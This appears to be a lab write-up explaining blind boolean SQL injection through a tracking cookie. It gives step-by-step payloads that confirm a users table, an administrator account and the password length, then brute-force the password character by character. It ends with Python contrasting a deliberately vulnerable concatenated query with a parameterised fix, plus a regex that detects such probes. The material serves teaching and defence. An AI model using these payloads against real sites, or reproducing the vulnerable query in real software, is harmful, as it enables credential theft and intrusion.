Understanding this with an example:
A cookie is sent with the request, e.g. Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
When that id reaches the analytics server it gets processed into a SQL query like SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
Since the cookie value ends up inside that query, SQL can be sent in the cookie. If a valid TrackingId is given, a "Welcome back" message is shown in the response.
This TrackingId is where blind SQL injection can be used. First test the waters with some conditional statements like ' AND '1'='1
and ' AND '1'='2
The former is a true condition and the latter a false condition.
With the true condition, the "Welcome back" message is shown in the response; with the false condition it is not.
This lets us extract data one piece at a time, by testing a single injected condition per request.
For example: a table Users with the columns Username and Password, and a user called Administrator. The password for that user can be found by sending a series of inputs that determine it one character at a time.
' AND (SELECT 'a' FROM users LIMIT 1)='a
→ to verify if there's a table called users
' AND (SELECT 'a' FROM users WHERE username='administrator')='a
→ to see if there’s a user called administrator
' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
→ to find out the length of the password: keep increasing that number by 1 until the message no longer appears in the response
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
→ to test, position by position, which character is at that position in the password. Set the payload position on the a, and in the payloads section send a-z and 0-9; grep the responses for whether the welcome message is shown or not.
After the first iteration, whichever character produced the Welcome message is the first letter of the password. Now change the request and increase the number to 2, like this -> ..SUBSTRING(password,2,1)..
and keep the rest the same. Keep changing the number this way until the full password length is reached.
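Why the true/false conditions above change the response, and what stops them: the string-built query the note describes, beside its parameterised fix and a simple log/WAF check for this kind of cookie. This is an added example, not code from the note or the lab; the in-memory SQLite database, the TrackedUsers row and the regex are constructed here.

```python
import re
import sqlite3


def make_db():
    # Constructed sample database mirroring the note's TrackedUsers table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE TrackedUsers (TrackingId TEXT)")
    con.execute("INSERT INTO TrackedUsers VALUES ('u5YD3PapBcR4lN3e7Tj4')")
    return con


def lookup_vulnerable(con, tracking_id):
    # The cookie value is concatenated into the SQL text, so anything after a
    # closing quote in the cookie is parsed as SQL: this is the blind SQLi sink.
    sql = ("SELECT TrackingId FROM TrackedUsers WHERE TrackingId = '"
           + tracking_id + "'")
    return con.execute(sql).fetchone() is not None


def lookup_safe(con, tracking_id):
    # Parameterised query: the cookie value is bound as data, so quotes and
    # AND clauses inside it are compared literally, never executed.
    sql = "SELECT TrackingId FROM TrackedUsers WHERE TrackingId = ?"
    return con.execute(sql, (tracking_id,)).fetchone() is not None


def response_for(found):
    # The page behaves as the note describes: a "Welcome back" banner only
    # when the id matches. That visible difference is the boolean oracle.
    return "Welcome back" if found else ""


# Constructed detection pattern: a quote followed by an AND/OR condition is
# not something a legitimate client puts in a tracking cookie.
BOOLEAN_PROBE = re.compile(r"'\s*(AND|OR)\s+.*'", re.IGNORECASE)


def looks_like_boolean_probe(cookie_value):
    # Cheap check to run over access logs or at the edge before the query.
    return BOOLEAN_PROBE.search(cookie_value) is not None
```

With lookup_vulnerable the note's ' AND '1'='1 and ' AND '1'='2 suffixes flip the banner on and off; with lookup_safe both are simply unknown ids and the banner never appears.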